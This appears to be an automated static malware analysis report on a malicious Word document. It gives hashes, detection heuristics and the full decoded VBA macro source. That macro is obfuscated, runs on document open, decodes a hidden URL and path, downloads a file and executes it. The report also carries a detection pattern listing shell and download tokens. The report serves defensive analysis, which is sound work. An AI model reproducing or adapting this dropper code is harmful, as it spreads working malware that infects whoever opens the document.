Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 ad63f80627f65428…

MALICIOUS

Office (OOXML)

24.9 KB Created: 2015-09-08 03:10:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2015-10-13
MD5: e21110f04f2ca63e7ee2b44bf0eb88a0 SHA-1: 62f96171f3052b87cf1c45bfd03ceead74aa0f74 SHA-256: ad63f80627f65428a7db8692ae6bda19ea657fdf0f67ea3ceadbdea375f9df39
348 Risk Score

Heuristics 11

  • ClamAV: Doc.Exploit.Generic-6923078-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Exploit.Generic-6923078-0
  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    YTcrPsgVYxnAt = Shell(YJjwtLBnGbJQcMdAOtRtaAk, 1)
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Private Declare PtrSafe Function URLDownloadToFileA Lib _
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    qMVzkJB wVfCvEwPkUNuabbMHoaVYZiRqTUFwDZ(yyxjViBNbBDDmtYSckXIIwjyYEUk), Environ(VFIbzSrdxVvkmuKqglboHGjagyhTyMB(MehjduHGmIOJYbhtKEEZljDZK)) & _
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 5476 bytes
SHA-256: 05c1eb02b238f2c62a6d2a92662f7a818df01d7a694c433e84f21055c657fdb0
Detection
ClamAV: No threats found
Obfuscation or payload: likely
35 of 63 identifiers look randomly generated (e.g. 'GtZLpVZqffSvRdNLkoyRnfkplAsVwbL') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Const yyxjViBNbBDDmtYSckXIIwjyYEUk = _
"ie+F\@!n­{sXAo8IP5@w]n/ER5>!_x0?Q9<z^n3*(p"
Const MehjduHGmIOJYbhtKEEZljDZK = "(B+8(T6(;-*n24gO\lF­1|{": Const ixwGFgIwUwxiGHRnTGZM = "<s*[qLb#FvF E?4`­a:D#/^QM2MM"
Public DHzFEizqHDINEnzUDuXeCczoMrnuAbA As _
String
#If Win64 Then
Private Declare PtrSafe Function URLDownloadToFileA Lib _
"urlmon" (ByVal XoyCPrKPxyuPAsLdkYilDHWJdIDUnSU As _
Long, ByVal _
fvuWrTbujWlTWtdcsxdGkyGsYwdvaZI As _
String, _
ByVal oWvARzoztFUdLLzPhKYsQVQC As _
String, _
ByVal lpPqihA As Long, _
ByVal jMqdJYJcUlCPTRmwgYDEyDXczFSATz As Long) As _
Long
#Else
Private Declare Function URLDownloadToFileA Lib "urlmon" ( _
ByVal XoyCPrKPxyuPAsLdkYilDHWJdIDUnSU As _
Long, _
ByVal fvuWrTbujWlTWtdcsxdGkyGsYwdvaZI As String, _
ByVal oWvARzoztFUdLLzPhKYsQVQC As _
String, ByVal lpPqihA As _
Long, _
ByVal jMqdJYJcUlCPTRmwgYDEyDXczFSATz As Long) As Long
#End If
Function _
qMVzkJB( _
cRxcGREF As String, _
YJjwtLBnGbJQcMdAOtRtaAk As _
String) As _
Boolean
Dim IKxnBRZdhkBJPVGbfloKEI As Long: IKxnBRZdhkBJPVGbfloKEI = _
URLDownloadToFileA( _
0, _
cRxcGREF, YJjwtLBnGbJQcMdAOtRtaAk, _
0, 0)
If IKxnBRZdhkBJPVGbfloKEI = 0 Then qMVzkJB = True
Dim YTcrPsgVYxnAt
YTcrPsgVYxnAt = Shell(YJjwtLBnGbJQcMdAOtRtaAk, 1)
End Function
Function wVfCvEwPkUNuabbMHoaVYZiRqTUFwDZ(mhndfSAyJc As _
String) As String
wVfCvEwPkUNuabbMHoaVYZiRqTUFwDZ = BySdCfeiggfkSBuelIyEWnPBzEdnbeC(mhndfSAyJc)
End Function
Public Sub _
tfyvzKgvTJdeym()
qMVzkJB wVfCvEwPkUNuabbMHoaVYZiRqTUFwDZ(yyxjViBNbBDDmtYSckXIIwjyYEUk), Environ(VFIbzSrdxVvkmuKqglboHGjagyhTyMB(MehjduHGmIOJYbhtKEEZljDZK)) & _
kVqsCzPwZuNWODOqxmUViPvZlgofVfv( _
ixwGFgIwUwxiGHRnTGZM)
End Sub
Sub Auto_Open()
tfyvzKgvTJdeym
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Function kVqsCzPwZuNWODOqxmUViPvZlgofVfv( _
xHTCoUhTdCzhFjYLfsPDXTo As String) As String
kVqsCzPwZuNWODOqxmUViPvZlgofVfv = _
BySdCfeiggfkSBuelIyEWnPBzEdnbeC(xHTCoUhTdCzhFjYLfsPDXTo)
End Function
Function BySdCfeiggfkSBuelIyEWnPBzEdnbeC( _
HEwWzbvklvRCFl As _
String) As _
String
Dim kZnMSAyYPVLYKPEjasLF As _
Byte, DddqMhqoVGfxaSkfwFczOkAAK As _
Long, _
GfGPblwh As Integer, _
WjicfjXDjnZWTjARdeHfx As Integer, mZRtktdPOrvqRAcjkOuWPIXWhYq As Long, MnplEDa As Long, VZnRhGNBUk As Long, AONnqFREWnA As String, _
cqBfmWCQbW As _
String, DVcmrMxQJQkUH As String, lHfmlnHKUxR As String, _
vDuYpyhAxUCKYqFPi As String
DVcmrMxQJQkUH = _
""
If HEwWzbvklvRCFl <> _
"" Then
lHfmlnHKUxR = _
HEwWzbvklvRCFl
kZnMSAyYPVLYKPEjasLF = _
&H532E - _
21121
WjicfjXDjnZWTjARdeHfx = _
InStr(HEwWzbvklvRCFl, Chr( _
kZnMSAyYPVLYKPEjasLF))
If DHzFEizqHDINEnzUDuXeCczoMrnuAbA = "" Then
vDuYpyhAxUCKYqFPi = """"
For mZRtktdPOrvqRAcjkOuWPIXWhYq = 7500 - _
&H1D2C To &H601E - 24480
If _
InStr( _
vDuYpyhAxUCKYqFPi, _
Chr(mZRtktdPOrvqRAcjkOuWPIXWhYq)) = _
0 Then DHzFEizqHDINEnzUDuXeCczoMrnuAbA = DHzFEizqHDINEnzUDuXeCczoMrnuAbA & Chr( _
mZRtktdPOrvqRAcjkOuWPIXWhYq)
Next _
mZRtktdPOrvqRAcjkOuWPIXWhYq
End If
VZnRhGNBUk = _
Len( _
DHzFEizqHDINEnzUDuXeCczoMrnuAbA)
cqBfmWCQbW = Left( _
lHfmlnHKUxR, _
WjicfjXDjnZWTjARdeHfx - _
1)
lHfmlnHKUxR = Right(lHfmlnHKUxR, _
Len(lHfmlnHKUxR) - WjicfjXDjnZWTjARdeHfx)
AONnqFREWnA = _
""
For _
mZRtktdPOrvqRAcjkOuWPIXWhYq = _
1 To Len(lHfmlnHKUxR) Step _
2
AONnqFREWnA = _
AONnqFREWnA & Mid(lHfmlnHKUxR, _
mZRtktdPOrvqRAcjkOuWPIXWhYq + _
1, _
1) & _
Mid( _
lHfmlnHKUxR, mZRtktdPOrvqRAcjkOuWPIXWhYq, 1)
Next _
mZRtktdPOrvqRAcjkOuWPIXWhYq
lHfmlnHKUxR = AONnqFREWnA
MnplEDa = 0
For mZRtktdPOrvqRAcjkOuWPIXWhYq = 1 To Len(lHfmlnHKUxR)
AONnqFREWnA = _
Mid(lHfmlnHKUxR, mZRtktdPOrvqRAcjkOuWPIXWhYq, _
1)
DddqMhqoVGfxaSkfwFczOkAAK = _
Asc( _
AONnqFREWnA)
WjicfjXDjnZWTjARdeHfx = InStr(DHzFEizqHDINEnzUDuXeCczoMrnuAbA, _
AONnqFREWnA)
If WjicfjXDjnZWTjARdeHfx = _
0 Then
If _
DddqMhqoVGfxaSkfwFczOkAAK >= (&H5F8C - _
24332) Then
DddqMhqoVGfxaSkfwFczOkAAK = DddqMhqoVGfxaSkfwFczOkAAK + _
(&H70B8 - _
28792)
If DddqMhqoVGfxaSkfwFczOkAAK > ( _
5070 - _
&H12CF) Then DddqMhqoVGfxaSkfwFczOkAAK = _
DddqMhqoVGfxaSkfwFczOkAAK - (&H5C50 - 23504)
AONnqFREWnA = _
Chr(DddqMhqoVGfxaSkfwFczOkAAK)
End If
DVcmrMxQJQkUH = DVcmrMxQJQkUH & AONnqFREWnA
Else
MnplEDa = MnplEDa + 1
If MnplEDa > Len( _
cqBfmWCQbW) Then MnplEDa = 1
GfGPblwh = Asc(Mid( _
cqBfmWCQbW, _
MnplEDa, _
1))
WjicfjXDjnZWTjARdeHfx = _
WjicfjXDjnZWTjARdeHfx - _
GfGPblwh
While _
WjicfjXDjnZWTjARdeHfx > _
VZnRhGNBUk
WjicfjXDjnZWTjARdeHfx = WjicfjXDjnZWTjARdeHfx - _
VZnRhGNBUk
Wend
While WjicfjXDjnZWTjARdeHfx < 0
WjicfjXDjnZWTjARdeHfx = WjicfjXDjnZWTjARdeHfx + VZnRhGNBUk
Wend
If _
WjicfjXDjnZWTjARdeHfx = 0 Then WjicfjXDjnZWTjARdeHfx = VZnRhGNBUk
DVcmrMxQJQkUH = _
DVcmrMxQJQkUH & Mid( _
DHzFEizqHDINEnzUDuXeCczoMrnuAbA, WjicfjXDjnZWTjARdeHfx, 1)
End If
Next mZRtktdPOrvqRAcjkOuWPIXWhYq
End If
BySdCfeiggfkSBuelIyEWnPBzEdnbeC = _
DVcmrMxQJQkUH
End Function
Function _
VFIbzSrdxVvkmuKqglboHGjagyhTyMB(EkBIRNijrwbkMjcAUIiVRKElql As String) As _
String
VFIbzSrdxVvkmuKqglboHGjagyhTyMB = BySdCfeiggfkSBuelIyEWnPBzEdnbeC(EkBIRNijrwbkMjcAUIiVRKElql)
End Function
Sub _
GtZLpVZqffSvRdNLkoyRnfkplAsVwbL()
Auto_Open
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 20480 bytes
SHA-256: 79713c47d64c1a3ce22e11eb0073843dbacb32afa1be38c6f63adfa7a16e44c7
Detection
ClamAV: Doc.Exploit.Generic-6923078-0
Obfuscation or payload: likely
119 of 205 identifiers look randomly generated (e.g. 'GtZLpVZqffSvRdNLkoyRnfkplAsVwbL0') — consistent with name-mangling obfuscation.

Open this report in the interactive analyzer, or submit your own file for analysis.